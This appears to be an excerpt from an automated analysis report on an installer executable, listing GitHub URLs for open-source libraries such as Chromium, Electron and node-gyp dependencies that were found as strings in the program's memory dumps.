Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/LearnBoost/node-canvas/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Maratyszcza/pthreadpool
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/NickNaso/ghostscript4js/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/NickNaso/magick-cli/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Nicoshev/rapidhash
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Nicoshev/rapidhash/blob/master/rapidhash.h
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/PortAudio/portaudio/tree/master/src/common
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ReactiveX/rxjs
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ReklatsMasters/node-process-list/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/SeleniumHQ/selenium/tree/trunk
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-socks-proxy-agent#readme
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-time/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-weak/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/ref/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.border-boxcontent-bo
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/shared-element-transitions/blob/main/debugging_overflow_on_images.md.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/view-transitions/blob/main/debugging_overflow_on_images.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebAssembly/wasm-c-api/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebBluetoothCG/web-bluetooth/blob/main/implementation-status.md
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/XadillaX/aliyun-ons/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/XadillaX/thmclrx/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/aawc/unrar.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/adaltas/node-krb5/blob/master/binding.gyp)#
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/andrewrk/node-mv/blob/master/package.json
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astro/node-expat/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/astro/node-expat/blob/master/deps/libexpat/libexpat.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bnoordhuis/node-buffertools/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bolgovr/node-ip2location/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brailcom/speechd
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/c4milo/node-fann/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/c4milo/node-inotify/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/c4milo/v8-profiler/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/supports-color
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/chjj/pty.js/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/creationix/topcube/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/developmentseed/node-sqlite3/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/developmentseed/node-sqlite3/blob/master/deps/sqlite3.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dpranke/typ.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/etingof/pyasn1
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/diff-match-patch/tree/master/javascript
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/distributed_point_functions
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/google-api-cpp-client/
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/pprof/tree/master/proto
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/private-join-and-compute
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/protobuf
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/re2
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ruy
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/securemessage
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/sentencepiece
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/shell-encryption
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/ukey2
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/unique-filename
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/unique-filename.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/inspect-js/is-date-object/blob/main/index.js#L3-L11
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/intel/libva
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/minipass-fetch)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/minipass.git
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joeferner/node-oracle/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/323)).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/pull/141
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-jsonfile#readfilefilename-options-callback).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-jsonfile#readfilesyncfilename-options).
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jrmuizel/qcms/tree/v4
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/justinlatimer/node-midi/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/kenchris/urlpattern-polyfill
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lloyd/node-memwatch/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/lovell/sharp/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/luismreis/node-openvg-canvas/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/luismreis/node-openvg/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/pump
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mapbox/node-zipfile/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mapnik/node-mapnik/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/martine/ninja/blob/master/misc/ninja_syntax.py
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/milani/appjs/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mixu/nwm/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/binding.gyp)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/disburse.py)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/includable.gypi)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mmod/nk-xrm-installer/blob/master/unpack.py)
Source: Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mmod/nodamysql/blob/master/binding.gyp)
